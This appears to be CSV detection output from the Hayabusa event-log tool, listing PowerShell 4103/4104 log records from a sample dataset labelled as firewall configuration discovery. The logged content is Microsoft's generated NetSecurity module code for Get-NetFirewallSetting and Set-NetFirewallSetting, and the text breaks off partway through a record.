ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmd",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,letization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdleti,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] 